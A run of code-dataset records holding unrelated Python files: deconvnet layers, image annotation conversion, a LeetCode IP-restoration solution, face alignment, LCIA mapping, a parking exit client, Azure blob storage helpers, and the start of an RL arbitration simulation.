Arguments\n data: Data to be operated in backward pass\n learning_phase: learning_phase of Keras, 1 or 0\n # Returns\n Recovered data\n \"\"\"\n new_shape = [data.shape[0]] + list(self.shape)\n assert np.prod(self.shape) == np.prod(data.shape[1:])\n self.down_data = np.reshape(data, new_shape)\n return self.down_data\n\n\nclass DInput(DLayer):\n \"\"\"\n A class to define forward and backward operation on Input\n \"\"\"\n\n def up(self, data, learning_phase=0):\n \"\"\"\n function to operate input in forward pass, the input and output\n are the same\n # Arguments\n data: Data to be operated in forward pass\n learning_phase: learning_phase of Keras, 1 or 0\n # Returns\n data\n \"\"\"\n self.up_data = data\n return self.up_data\n\n def down(self, data, learning_phase=0):\n \"\"\"\n function to operate input in backward pass, the input and output\n are the same\n # Arguments\n data: Data to be operated in backward pass\n learning_phase: learning_phase of Keras, 1 or 0\n # Returns\n data\n \"\"\"\n self.down_data = data\n return self.down_data\n\n\ndef _K_function(inputs, out):\n if K.backend() == 'theano' or isinstance(out, (list, tuple)):\n return K.function(inputs, out)\n else:\n return K.function(inputs, [out])","sub_path":"deconvnet/layers.py","file_name":"layers.py","file_ext":"py","file_size_in_byte":12265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
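+# --- Illustrative aside, not part of the dataset record above: the DPooling class in
+# the preceding layers.py record remembers a "switch" (argmax mask) during max pooling
+# and unpools with np.kron. A minimal self-contained numpy sketch of that same idea,
+# assuming a single channel and a 2x2 pool (all names below are ours, not the record's):
+import numpy as np
+
+x = np.array([[1., 3., 2., 0.],
+              [4., 2., 1., 1.],
+              [0., 1., 5., 2.],
+              [2., 1., 0., 3.]])
+
+pooled = np.zeros((2, 2))
+switch = np.zeros_like(x)
+for r in range(2):
+    for c in range(2):
+        patch = x[2 * r:2 * r + 2, 2 * c:2 * c + 2]
+        pooled[r, c] = patch.max()
+        mr, mc = np.unravel_index(patch.argmax(), patch.shape)
+        switch[2 * r + mr, 2 * c + mc] = 1  # remember where each max came from
+
+# np.kron tiles each pooled value over its 2x2 block; multiplying by the switch
+# keeps the value only at the original argmax location (zeros elsewhere).
+unpooled = np.kron(pooled, np.ones((2, 2))) * switch
+print(unpooled)
+# --- end of aside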
+{"seq_id":"610267052","text":"import Augmentor\nimport os\nimport json\nimport requests\nimport cv2\nimport datetime as dt\nimport numpy as np\nfrom PIL import Image\nfrom shapely import wkt\nfrom pascal_voc_writer import Writer as PascalWriter\n\nfrom .generator.pascal_voc import PascalVOCGenerator\n\n\nclass LabeledImagePascalVOC:\n \"\"\" Custom class matching returned json object of labelbox.io. \"\"\"\n\n ANNOTATION_PASCAL_VOC = 'Pascal VOC'\n SKIPPED_LABEL = 'Skip'\n\n def __init__(self, logger, *args, **kwargs):\n self._logger = logger(__name__)\n self._id = kwargs['ID']\n self._source_img_url = kwargs['Labeled Data']\n self._created_by = kwargs['Created By']\n self._project_name = kwargs['Project Name']\n self._seconds_to_label = kwargs['Seconds to Label']\n self._images_dir = kwargs['Images Dir']\n self._resized_image_dir = kwargs['Resized Image Dir']\n self._annotations_dir = kwargs['Annotations Dir']\n self._required_img_height = kwargs['Required Image Height']\n self._required_img_width = kwargs['Required Image Width']\n self.label_names = set()\n self._file_name = self._source_img_url.rsplit('/', 1)[-1].split('.')[0]\n self._file_ext = '.' + \\\n self._source_img_url.split(\"/\")[-1].split('.')[1]\n self._download_image(kwargs['Label'])\n self._resize_image(self._image_file_path)\n self._generate_pascal_voc_file(logger, kwargs['Label'], apply_reduction=True, debug=True)\n\n def _download_image(self, json_labels):\n \"\"\" Download image from provided link (Cloud link).\"\"\"\n file_name = self._file_name + self._file_ext\n self._image_file_path = os.path.join(self._images_dir, file_name)\n\n if not os.path.exists(self._image_file_path):\n try:\n response = requests.get(self._source_img_url, stream=True)\n response.raw.decode_content = True\n image = Image.open(response.raw)\n self._img_width, self._img_height = image.size\n image.save(self._image_file_path, format=image.format)\n self._logger.info('Downloaded image form source {} at {}'.format(\n self._source_img_url, self._image_file_path))\n\n except requests.exceptions.MissingSchema as e:\n self._logger.exception(\n '\"source_image_url\" attribute must be a URL.')\n except requests.exceptions.ConnectionError as e:\n self._logger.exception(\n 'Failed to fetch image from {}'.format(self._source_img_url))\n else:\n image = Image.open(self._image_file_path)\n self._img_width, self._img_height = image.size\n self._logger.warn('WARN: Skipping file download since it already exist @ {}\\n'.format(\n self._image_file_path))\n\n def _resize_image(self, image_path):\n file_name = self._file_name + self._file_ext\n self._resized_image_path = os.path.join(\n self._resized_image_dir, file_name)\n\n img = cv2.imread(image_path)\n\n height, width = img.shape[:2]\n\n self._aspect_ratio = float(width)/height\n\n scaled_height = 300\n scaled_width = 300\n\n # interpolation method\n if height > self._required_img_height or width > self._required_img_width: # shrinking image\n interp = cv2.INTER_AREA\n else: # stretching image\n interp = cv2.INTER_CUBIC\n\n # aspect ratio of image\n\n # compute scaling and pad sizing\n if self._aspect_ratio > 1: # horizontal image\n new_width = scaled_width\n new_height = np.round(new_width/self._aspect_ratio).astype(int)\n pad_vert = (scaled_height-new_height)/2\n self._pad_top, self._pad_bot = np.floor(\n pad_vert).astype(int), np.ceil(pad_vert).astype(int)\n self._pad_left, self._pad_right = 0, 0\n elif self._aspect_ratio < 1: # vertical image\n new_height = scaled_height\n new_width = 
np.round(new_height*self._aspect_ratio).astype(int)\n            pad_horz = (scaled_width-new_width)/2\n            self._pad_left, self._pad_right = np.floor(\n                pad_horz).astype(int), np.ceil(pad_horz).astype(int)\n            self._pad_top, self._pad_bot = 0, 0\n        else: # square image\n            new_height, new_width = scaled_height, scaled_width\n            self._pad_left, self._pad_right, self._pad_top, self._pad_bot = 0, 0, 0, 0\n\n        # factors to scale bounding box values\n        self._x_factor = float(width) / self._required_img_width\n        self._y_factor = float(height) / (self._required_img_height - self._pad_bot - self._pad_top)\n\n        # set pad color (black by default); for a color image with a single\n        # pad color provided, expand it to one value per channel\n        padColor = 0\n        if len(img.shape) == 3 and not isinstance(padColor, (list, tuple, np.ndarray)):\n            padColor = [padColor]*3\n\n        # scale and pad\n        scaled_img = cv2.resize(img, (new_width, new_height), interpolation=interp)\n        scaled_img = cv2.copyMakeBorder(\n            scaled_img, self._pad_top, self._pad_bot, self._pad_left, self._pad_right, borderType=cv2.BORDER_CONSTANT, value=padColor)\n\n        if not os.path.exists(self._resized_image_path):\n            cv2.imwrite(self._resized_image_path, scaled_img)\n            self._logger.info('Resized image at {}.jpg'.format(\n                self._resized_image_path))\n        else:\n            self._logger.warn('WARN: Skipping file resizing since it already exist @ {}\\n'.format(\n                self._resized_image_path))\n\n    def _generate_pascal_voc_file(self, logger, json_labels, apply_reduction=False, debug=False):\n        \"\"\" Transform WKT polygon to pascal voc. \"\"\"\n        config = {\n            'labelbox_id': self._id,\n            'project_name': self._project_name,\n            'json_labels': json_labels,\n            'annotation_dir': self._annotations_dir,\n            'apply_reduction': apply_reduction,\n            'debug': debug\n        }\n\n        if apply_reduction:\n            config.update({\n                'image_path': self._resized_image_path,\n                'image_width': self._required_img_width,\n                'image_height': self._required_img_height,\n                'x_factor': self._x_factor,\n                'y_factor': self._y_factor,\n                'pad_top': self._pad_top,\n                'pad_left': self._pad_left,\n            })\n        else:\n            config.update({\n                'image_path': self._image_file_path,\n                'image_width': self._img_width,\n                'image_height': self._img_height,\n                'x_factor': 1,\n                'y_factor': 1,\n                'pad_top': 0,\n                'pad_left': 0,\n            })\n        generator = PascalVOCGenerator(logger, config)\n        self.label_names.update(generator.label_names)\n","sub_path":"extractor/core/data/labelbox.py","file_name":"labelbox.py","file_ext":"py","file_size_in_byte":6862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"650018355","text":"class Solution(object):\n def check(self, s):\n if len(s) < 2:\n return True\n elif len(s) == 2:\n return \"10\" <= s <= \"99\" # prevent 01,02,03...\n else:\n return \"100\" <= s <= \"255\" # prevent 256,257...\n\n def dfs(self, depth, maxDepth, s, startPos, pos, ans):\n\n if depth == maxDepth:\n if startPos == len(s):\n address = s[0:pos[0]]\n for i in range(1, maxDepth):\n address = address + '.' + s[pos[i - 1]:pos[i]]\n ans.append(address)\n return\n\n for i in range(startPos + 1, startPos + 4):\n if self.check(s[startPos: i]):\n pos[depth] = i\n self.dfs(depth + 1, 4, s, i, pos, ans)\n\n def restoreIpAddresses(self, s):\n \"\"\"\n :type s: str\n :rtype: List[str]\n \"\"\"\n ans = []\n pos = [0, 0, 0, 0]\n self.dfs(0, 4, s, 0, pos, ans)\n\n\ns = Solution()\ns.restoreIpAddresses(\"0000\")","sub_path":"Algorithm/Restore IP Addresses/Restore IP Addresses.py","file_name":"Restore IP Addresses.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"589016206","text":"from enum import Enum\n\nimport dlib\nimport numpy as np\nimport skimage.transform as tr\n\n\nclass FaceDetectorException(Exception):\n pass\n\n\nclass FaceDetector:\n def __init__(self):\n self.detector = dlib.get_frontal_face_detector()\n\n def detect_faces(self, image, *, upscale_factor=1, greater_than=None, get_top=None):\n try:\n face_rects = list(self.detector(image, upscale_factor))\n except Exception as e:\n raise FaceDetectorException(e.args)\n\n if greater_than is not None:\n face_rects = list(\n filter(\n lambda r: r.height() > greater_than and r.width() > greater_than,\n face_rects,\n )\n )\n\n face_rects.sort(key=lambda r: r.width() * r.height(), reverse=True)\n\n if get_top is not None:\n return face_rects[:get_top]\n\n return face_rects\n\n\nclass FaceAlignMask(Enum):\n INNER_EYES_AND_BOTTOM_LIP = [39, 42, 57]\n OUTER_EYES_AND_NOSE = [36, 45, 33]\n\n\nclass FaceAligner:\n def __init__(self, dlib_predictor_path, face_template_path):\n self.predictor = dlib.shape_predictor(dlib_predictor_path)\n self.face_template = np.load(face_template_path)\n\n def get_landmarks(self, image, face_rect):\n points = self.predictor(image, face_rect)\n return np.array(list(map(lambda p: [p.x, p.y], points.parts())))\n\n def align_face(\n self,\n image,\n face_rect,\n *,\n dim=96,\n border=0,\n mask=FaceAlignMask.INNER_EYES_AND_BOTTOM_LIP\n ):\n mask = np.array(mask.value)\n\n landmarks = self.get_landmarks(image, face_rect)\n proper_landmarks = border + dim * self.face_template[mask]\n A = np.hstack([landmarks[mask], np.ones((3, 1))]).astype(np.float64)\n B = np.hstack([proper_landmarks, np.ones((3, 1))]).astype(np.float64)\n T = np.linalg.solve(A, B).T\n\n return tr.warp(\n image,\n tr.AffineTransform(T).inverse,\n output_shape=(dim + 2 * border, dim + 2 * border),\n order=3,\n mode=\"constant\",\n cval=0,\n clip=True,\n preserve_range=True,\n )\n\n def align_faces(self, image, face_rects, *args, **kwargs):\n result = []\n\n for rect in face_rects:\n result.append(self.align_face(image, rect, *args, **kwargs))\n\n return result\n\n\ndef clip_to_range(img):\n return img / 255.0\n","sub_path":"preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":2477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"99807442","text":"# -*- coding: utf-8 -*-\nimport utils, os, pandas, numpy, MasterData, time\nfrom copy import copy\n\n#this script takes the mapping ILCD to ecoinvent and creates the \n#public excel file of the mapped CFs, and the standard method xlsx\n\ndef apply_status(x):\n if utils.is_empty(x[0]):\n return 'method orphan'\n elif utils.is_empty(x[1]):\n return 'ecoinvent orphan'\n else:\n return 'mapped'\n\ndef mapping_to_mapped(version):\n ecoQuery_folder = r'C:\\Dropbox (ecoinvent)\\ei-int\\technical\\internal\\LCIA management\\{}\\ecoQuery files'.format(version)\n mapping_folder = r'C:\\Dropbox (ecoinvent)\\ei-int\\technical\\internal\\LCIA management\\{}\\mapping files'.format(version)\n \n #load category mapping\n filename = 'category_mapping_{}.xlsx'.format(version)\n tab = 'categories'\n category_mapping = utils.read_excel(mapping_folder, filename, tab)\n tab = 'methods'\n method_uuid = utils.read_excel(mapping_folder, filename, tab)\n method_uuid = method_uuid.set_index('method')\n \n #load ee mapping\n filename = 'recipe_mapping_3.5.xlsx'\n tab = 'Sheet1'\n ee_mapping = utils.read_excel(mapping_folder, filename, tab)\n ee_mapping = utils.replace_empty_in_df(ee_mapping, '')\n category_mapping['ecoinvent name'] = category_mapping[\n ['category name in ecoinvent', 'indicator name in ecoinvent']].apply(\n lambda x: x[0] + '//' + x[1], axis = 1)\n dfs = []\n def apply_scaling(x):\n if utils.is_empty(x[1]):\n return ''\n else:\n return x[1] * x[0]\n def apply_mapped_correction(x):\n to_correct = False\n if x[0] == 'mapped':\n to_correct = True\n for u in tuple(x.to_dict().values())[1:]:\n if not utils.is_empty(u):\n to_correct = False\n break\n return to_correct\n for method_name in ['ReCiPe Midpoint (I) V1.13', 'ReCiPe Midpoint (H) V1.13', 'ReCiPe Midpoint (E) V1.13']:\n #load CFs\n print(method_name)\n tab = 'CFs'\n filename = method_uuid.loc[method_name, 'standard excel filename']\n method = utils.read_excel(ecoQuery_folder, filename, tab)\n index = ['simapro name', 'simapro compartment', 'simapro subcompartment', 'simapro unit']\n method = method.rename(columns = dict(zip(['substance', 'compartment', 'subcompartment', 'unit'], index)))\n df = ee_mapping.set_index(index).join(method.set_index(index), how = 'outer').reset_index()\n df = utils.replace_empty_in_df(df, '')\n for col in df:\n df = df.replace(to_replace = {col: {'(no match)': ''}})\n category_mapping_ = category_mapping[category_mapping['method name in ecoinvent'].apply(\n lambda x: method_name in x)]\n d = dict(zip(list(category_mapping_['category name in method']), list(category_mapping_['ecoinvent name'])))\n cols = list(d.keys())\n cols.insert(0, 'status')\n df['status'] = df[['ecoinvent name', 'simapro name']].apply(apply_status, axis = 1)\n c = df[cols].apply(apply_mapped_correction, axis = 1)\n for col in index:\n df.loc[c, col] = ''\n df.loc[c, 'status'] = 'ecoinvent orphan'\n df = df.rename(columns = d)\n #convert CFs using factor\n mapped = df[df['status'] == 'mapped']\n df = df[df['status'] != 'mapped']\n \n for col in d.values():\n mapped[col] = mapped[['conversion factor', col]].apply(apply_scaling, axis = 1)\n df = pandas.concat([mapped, df])\n \n #write mapped to excel\n df['comment'] = ''\n columns = [\n 'ecoinvent name', 'ecoinvent compartment', 'ecoinvent subcompartment', 'ecoinvent unit', \n 'simapro name', 'simapro compartment', 'simapro subcompartment', 'simapro unit', \n 'status', 'conversion factor', 'comment']\n columns.extend(tuple(d.values()))\n sel = 
utils.dataframe_to_series(method_uuid.loc[method_name])\n        dfs.append((df, sel['tab in mapped'], columns))\n    columns = ['method name in ecoinvent', 'category name in ecoinvent', 'indicator name in ecoinvent', 'unit']\n    category_mapping = category_mapping.rename(columns = {'unit in ecoinvent': 'unit'})\n    dfs.append((category_mapping, 'units', columns))\n    \n    read_me = [['', '']]*7#space for logo\n    read_me.extend([\n        ['© ecoinvent {}'.format(utils.timestamp().split('-')[0])], \n        ['python script', os.path.realpath(__file__)], \n        ['file generation date', utils.timestamp()], \n        ['file purpose', 'This file shows the explicit correspondance between ecoinvent nomenclature, method nomenclature, and associated CFs'], \n        ['method version', '1.13'], \n        ['source', 'as found in Simapro'], \n        ])\n    filename = utils.remove_forbiden_in_filename(sel['mapped excel filename'].format(version))\n    utils.dataframe_to_excel(ecoQuery_folder, filename, dfs, read_me = read_me, feedback = True)\nif __name__ == '__main__':\n    mapping_to_mapped('3.5')","sub_path":"projects/LCIA_management/recipe/ReCiPe_mapping_to_mapped.py","file_name":"ReCiPe_mapping_to_mapped.py","file_ext":"py","file_size_in_byte":5029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"448032724","text":"\n# Este archivo es el encargado de recibir la placa leída y decidir si dejar\n# pasar a un vehículo o no, dependiendo de la configuración de este. Además,\n# busca si la placa está registrada en el sistema, en caso de estarlo, busca\n# el usuario asociado al vehículo.\n\n# Este archivo básicamente maneja las alertas que se generan en el sistema.\n\n\n# from ac_seguridad.models import *\nfrom mysocket import MySocket\nimport socket\nimport pdb\nimport sys\nimport requests\n# Constantes.\nNUM_PUERTA = 5\nRIF = \"12345\"\nHOST = \"localhost\"\nPORT = 8000\n#1234 acceso restringido\n#0000 acceso no restringido\n#pdb.set_trace()\n# Funciones\ndef leer_placa():\n placa = input(\"Placa: \")\n return placa\ndef leer_ticket():\n ticket = input(\"ticket: \")\n resgistrado = input(\"registrado(True,False): \")\n return ticket, resgistrado\n\n# Programa comienza aquí.\n# ref: https://docs.python.org/3/howto/sockets.html\n# Crear un socket como cliente.\nprint(\"Creando socket\")\n# socket_cliente = MySocket()\n# socket_cliente.connect(host=HOST, port=PORT)\nprint(\"Socket conectado.\")\n\n# Enviar primer mensaje:\n# Estructura del primer mensaje:\n# * RIF: lleno\n# * ticket: None.\n# * placa: llena.\n# * tipo: llena ('placa_leida')\n# * puerta: llena.\n# * lectura_automatica: llena, sus posibles valores son:\n # True: lectura realizada de forma automática\n # False: lentura realizada de forma manual\n # None: No aplica la información (ejemplo, mensajes servidor-cliente)\n# * registrado: llena, true o false\n\nprint(\"Preparando mensaje\")\nmensaje = dict()\nmensaje['estacionamiento'] = RIF\nmensaje['ticket'], mensaje['registrado'] = leer_ticket()\nmensaje['placa'] = leer_placa()\nmensaje['puerta'] = NUM_PUERTA\nmensaje['tipo'] = 'placa_leida_salida'\nmensaje['lectura_automatica']= True\n\n\n\n\nprint(\"Enviando mensaje: {}\".format(mensaje))\n# socket_cliente.sendall_json(mensaje)\n# socket_cliente.mysend(\"Hola, este es el mensaje\\0\".encode(encoding=\"utf-8\", errors=\"strict\"))\nurl = \"http://{}:{}/manejador/manejar_mensaje/\".format(HOST,PORT)\ndata_mensaje = mensaje\nrespuesta_request = requests.post(url, data=data_mensaje)\nrespuesta = respuesta_request.json()\nprint(\"Mensaje enviado\")\n\nprint(\"Recibiendo respuesta\")\n# respuesta = socket_cliente.receive()\nprint(\"Respuesta recibida: {}\".format(respuesta))\n\nif (respuesta['tipo'] == \"OK_salida_estacionamiento\"):\n print(\"Luz verde.\")\n\nelif (respuesta['tipo'] == \"NO_ticket_placa\"):\n print(\"Luz roja.\")\n\nelif (respuesta['tipo'] == \"NO_ticket_pagado\"):\n print(\"Luz roja.\")\n\nelif (respuesta['tipo'] == \"NO_ticket_no_encontrado\"):\n print(\"Luz roja.\")\n\nelse:\n print(\"Respuesta no válida\")\n\n# socket_cliente.sock.shutdown(socket.SHUT_WR)\n# socket_cliente.sock.close()\n","sub_path":"project/manejador/cliente_salida.py","file_name":"cliente_salida.py","file_ext":"py","file_size_in_byte":2738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"340249914","text":"minimum = 10\nd = {}\n\n\n# recurse 안에서 시계 / 반시계\n\ndef recurse(weak, dist, cnt, n, clockwise):\n global minimum\n global d\n print(56, weak, dist, cnt)\n if not weak:\n if minimum > cnt:\n minimum = cnt\n return\n elif len(weak) == 1:\n if minimum > cnt+1:\n minimum = cnt +1\n return\n else:\n key = tuple(sorted(list(weak)))\n if d.get(key):\n if len(d[key]) >= len(dist):\n return\n else:\n d[key] = dist\n else:\n d[key] = dist\n\n if dist:\n friend = dist.pop()\n else:\n return\n for w in weak:\n todo = weak.copy()\n #clock\n print(12, \"friend\", friend)\n steps = range(w, w+friend+1) if clockwise else range(w , w-friend-1, -1)\n for k in steps:\n k = k % n\n print(k, end=' ')\n if k in todo:\n todo.remove(k)\n print()\n if todo == weak: # 더 이상 답이 없음 => 지우려고 해봐도 안지워짐\n return\n else:\n recurse(todo, dist[:], cnt + 1, n, clockwise)\n\n #counter\n\n\ndef solution(n, weak, dist):\n global minimum\n global d\n minimum = 10\n d = {}\n dist = sorted(dist)\n recurse(set(weak), dist[:], 0, n, True)\n print(d)\n d = {}\n recurse(set(weak), dist[:], 0, n, False)\n print(d)\n return minimum\n\n\nprint(\"answer\", solution(12, [1, 5, 6, 10], [1, 2, 3, 4]))\nprint(\"answer\", solution(12, [1, 3, 4, 9, 10], [3, 5, 7]))\n","sub_path":"practice/programmers/외벽점검.py","file_name":"외벽점검.py","file_ext":"py","file_size_in_byte":1549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"225985468","text":"from selenium import webdriver\nimport time \n\nlink = \"http://suninjuly.github.io/math.html\"\n\ntry:\n browser = webdriver.Chrome()\n browser.get(link)\n people_radio = browser.find_element_by_id(\"peopleRule\")\n people_checked = people_radio.get_attribute(\"checked\")\n\n robots_radio = browser.find_element_by_id(\"robotsRule\")\n robots_checked = robots_radio.get_attribute(\"checked\")\n\nfinally:\n # успеваем скопировать код за 30 секунд\n time.sleep(10)\n # закрываем браузер после всех манипуляций\n browser.quit()\n\n# не забываем оставить пустую строку в конце файла","sub_path":"help.py","file_name":"help.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"113434115","text":"#!/usr/bin/env python\n#\n# Copyright (c) Microsoft Corporation.\n# Licensed under the MIT License.\n\nimport datetime\nimport logging\nimport os\nimport urllib.parse\nfrom typing import Dict, Optional, Union, cast\n\nfrom azure.common import AzureHttpError, AzureMissingResourceHttpError\nfrom azure.storage.blob import BlobPermissions, BlockBlobService, ContainerPermissions\nfrom memoization import cached\nfrom onefuzztypes.primitives import Container\n\nfrom .storage import (\n StorageType,\n choose_account,\n get_accounts,\n get_storage_account_name_key,\n)\n\n\n@cached\ndef get_blob_service(account_id: str) -> BlockBlobService:\n logging.debug(\"getting blob container (account_id: %s)\", account_id)\n account_name, account_key = get_storage_account_name_key(account_id)\n service = BlockBlobService(account_name=account_name, account_key=account_key)\n return service\n\n\ndef get_service_by_container(\n container: Container, storage_type: StorageType\n) -> Optional[BlockBlobService]:\n account = get_account_by_container(container, storage_type)\n if account is None:\n return None\n service = get_blob_service(account)\n return service\n\n\ndef container_exists_on_account(container: Container, account_id: str) -> bool:\n try:\n get_blob_service(account_id).get_container_properties(container)\n return True\n except AzureHttpError:\n return False\n\n\ndef container_metadata(container: Container, account: str) -> Optional[Dict[str, str]]:\n try:\n result = get_blob_service(account).get_container_metadata(container)\n return cast(Dict[str, str], result)\n except AzureHttpError:\n pass\n return None\n\n\ndef get_account_by_container(\n container: Container, storage_type: StorageType\n) -> Optional[str]:\n accounts = get_accounts(storage_type)\n\n # check secondary accounts first by searching in reverse.\n #\n # By implementation, the primary account is specified first, followed by\n # any secondary accounts.\n #\n # Secondary accounts, if they exist, are preferred for containers and have\n # increased IOP rates, this should be a slight optimization\n for account in reversed(accounts):\n if container_exists_on_account(container, account):\n return account\n return None\n\n\ndef container_exists(container: Container, storage_type: StorageType) -> bool:\n return get_account_by_container(container, storage_type) is not None\n\n\ndef get_containers(storage_type: StorageType) -> Dict[str, Dict[str, str]]:\n containers: Dict[str, Dict[str, str]] = {}\n\n for account_id in get_accounts(storage_type):\n containers.update(\n {\n x.name: x.metadata\n for x in get_blob_service(account_id).list_containers(\n include_metadata=True\n )\n }\n )\n\n return containers\n\n\ndef get_container_metadata(\n container: Container, storage_type: StorageType\n) -> Optional[Dict[str, str]]:\n account = get_account_by_container(container, storage_type)\n if account is None:\n return None\n\n return container_metadata(container, account)\n\n\ndef create_container(\n container: Container,\n storage_type: StorageType,\n metadata: Optional[Dict[str, str]],\n) -> Optional[str]:\n service = get_service_by_container(container, storage_type)\n if service is None:\n account = choose_account(storage_type)\n service = get_blob_service(account)\n try:\n service.create_container(container, metadata=metadata)\n except AzureHttpError as err:\n logging.error(\n (\n \"unable to create container. 
account: %s \"\n \"container: %s metadata: %s - %s\"\n ),\n account,\n container,\n metadata,\n err,\n )\n return None\n\n return get_container_sas_url_service(\n container,\n service,\n read=True,\n add=True,\n create=True,\n write=True,\n delete=True,\n list=True,\n )\n\n\ndef delete_container(container: Container, storage_type: StorageType) -> bool:\n accounts = get_accounts(storage_type)\n for account in accounts:\n service = get_blob_service(account)\n if bool(service.delete_container(container)):\n return True\n\n return False\n\n\ndef get_container_sas_url_service(\n container: Container,\n service: BlockBlobService,\n *,\n read: bool = False,\n add: bool = False,\n create: bool = False,\n write: bool = False,\n delete: bool = False,\n list: bool = False,\n) -> str:\n expiry = datetime.datetime.utcnow() + datetime.timedelta(days=30)\n permission = ContainerPermissions(read, add, create, write, delete, list)\n\n sas_token = service.generate_container_shared_access_signature(\n container, permission=permission, expiry=expiry\n )\n\n url = service.make_container_url(container, sas_token=sas_token)\n url = url.replace(\"?restype=container&\", \"?\")\n return str(url)\n\n\ndef get_container_sas_url(\n container: Container,\n storage_type: StorageType,\n *,\n read: bool = False,\n add: bool = False,\n create: bool = False,\n write: bool = False,\n delete: bool = False,\n list: bool = False,\n) -> str:\n service = get_service_by_container(container, storage_type)\n if not service:\n raise Exception(\"unable to create container sas for missing container\")\n\n return get_container_sas_url_service(\n container,\n service,\n read=read,\n add=add,\n create=create,\n write=write,\n delete=delete,\n list=list,\n )\n\n\ndef get_file_sas_url(\n container: Container,\n name: str,\n storage_type: StorageType,\n *,\n read: bool = False,\n add: bool = False,\n create: bool = False,\n write: bool = False,\n delete: bool = False,\n list: bool = False,\n days: int = 30,\n hours: int = 0,\n minutes: int = 0,\n) -> str:\n service = get_service_by_container(container, storage_type)\n if not service:\n raise Exception(\"unable to find container: %s - %s\" % (container, storage_type))\n\n expiry = datetime.datetime.utcnow() + datetime.timedelta(\n days=days, hours=hours, minutes=minutes\n )\n permission = BlobPermissions(read, add, create, write, delete, list)\n\n sas_token = service.generate_blob_shared_access_signature(\n container, name, permission=permission, expiry=expiry\n )\n\n url = service.make_blob_url(container, name, sas_token=sas_token)\n return str(url)\n\n\ndef save_blob(\n container: Container,\n name: str,\n data: Union[str, bytes],\n storage_type: StorageType,\n) -> None:\n service = get_service_by_container(container, storage_type)\n if not service:\n raise Exception(\"unable to find container: %s - %s\" % (container, storage_type))\n\n if isinstance(data, str):\n service.create_blob_from_text(container, name, data)\n elif isinstance(data, bytes):\n service.create_blob_from_bytes(container, name, data)\n\n\ndef get_blob(\n container: Container, name: str, storage_type: StorageType\n) -> Optional[bytes]:\n service = get_service_by_container(container, storage_type)\n if not service:\n return None\n\n try:\n blob = service.get_blob_to_bytes(container, name).content\n return cast(bytes, blob)\n except AzureMissingResourceHttpError:\n return None\n\n\ndef blob_exists(container: Container, name: str, storage_type: StorageType) -> bool:\n service = get_service_by_container(container, 
storage_type)\n if not service:\n return False\n\n try:\n service.get_blob_properties(container, name)\n return True\n except AzureMissingResourceHttpError:\n return False\n\n\ndef delete_blob(container: Container, name: str, storage_type: StorageType) -> bool:\n service = get_service_by_container(container, storage_type)\n if not service:\n return False\n\n try:\n service.delete_blob(container, name)\n return True\n except AzureMissingResourceHttpError:\n return False\n\n\ndef auth_download_url(container: Container, filename: str) -> str:\n instance = os.environ[\"ONEFUZZ_INSTANCE\"]\n return \"%s/api/download?%s\" % (\n instance,\n urllib.parse.urlencode({\"container\": container, \"filename\": filename}),\n )\n","sub_path":"src/api-service/__app__/onefuzzlib/azure/containers.py","file_name":"containers.py","file_ext":"py","file_size_in_byte":8385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"506180651","text":"import torch\r\nimport getopt\r\nimport sys\r\nimport csv\r\nimport os\r\nimport simulation as sim\r\nimport math\r\nfrom random import randint\r\nfrom analysis import gData, MODE_MAP\r\nfrom tqdm import tqdm\r\nfrom numpy.random import choice\r\nfrom torch.autograd import Variable\r\nimport pandas as pd\r\nimport analysis\r\n\r\nimport numpy as np\r\nfrom scipy.interpolate import pchip_interpolate\r\nimport matplotlib.pyplot as plt\r\nfrom analysis import save_plt_figure\r\n\r\nfrom mdp import MDP\r\nfrom sarsa import SARSA\r\nfrom forward import FORWARD\r\nfrom arbitrator import BayesRelEstimator, AssocRelEstimator, Arbitrator\r\nimport dill as pickle # see https://stackoverflow.com/questions/25348532/can-python-pickle-lambda-functions\r\nimport random\r\n\r\nfrom mdp import MDP\r\nfrom ddqn import DoubleDQN\r\nfrom sarsa import SARSA\r\nfrom forward import FORWARD\r\nfrom arbitrator import BayesRelEstimator, AssocRelEstimator, Arbitrator\r\nfrom analysis import gData, RESULTS_FOLDER, COLUMNS, DETAIL_COLUMNS\r\nfrom common import makedir\r\nimport analysis\r\nfrom math import ceil\r\n#from main import MODE_LIST\r\n# preset constants\r\nMDP_STAGES = 2\r\nTOTAL_EPISODES = 200\r\nTRIALS_PER_EPISODE = 80\r\nSPE_LOW_THRESHOLD = 0.3#0.3\r\nSPE_HIGH_THRESHOLD = 0.45#0.5\r\nRPE_LOW_THRESHOLD = 4\r\nRPE_HIGH_THRESHOLD = 9 #10\r\nMF_REL_HIGH_THRESHOLD = 0.8\r\nMF_REL_LOW_THRESHOLD = 0.5\r\nMB_REL_HIGH_THRESHOLD = 0.7\r\nMB_REL_LOW_THRESHOLD = 0.3\r\nCONTROL_REWARD = 1\r\nCONTROL_REWARD_BIAS = 0\r\nINIT_CTRL_INPUT = [10, 0.5]\r\nDEFAULT_CONTROL_MODE = 'max-spe'\r\nCONTROL_MODE = DEFAULT_CONTROL_MODE\r\nCTRL_AGENTS_ENABLED = True\r\nRPE_DISCOUNT_FACTOR = 0.003\r\nACTION_PERIOD = 3\r\nSTATIC_CONTROL_AGENT = False\r\nENABLE_PLOT = True\r\nDISABLE_C_EXTENSION = False\r\nLEGACY_MODE = False\r\nMORE_CONTROL_INPUT = True\r\nSAVE_CTRL_RL = False\r\nPMB_CONTROL = False\r\nTASK_TYPE = 2020\r\nMF_ONLY = False\r\nMB_ONLY = False\r\nReproduce_BHV = False\r\nsaved_policy_path = ''\r\nSession_block = False\r\nmode202010 = False\r\nDECAY_RATE = 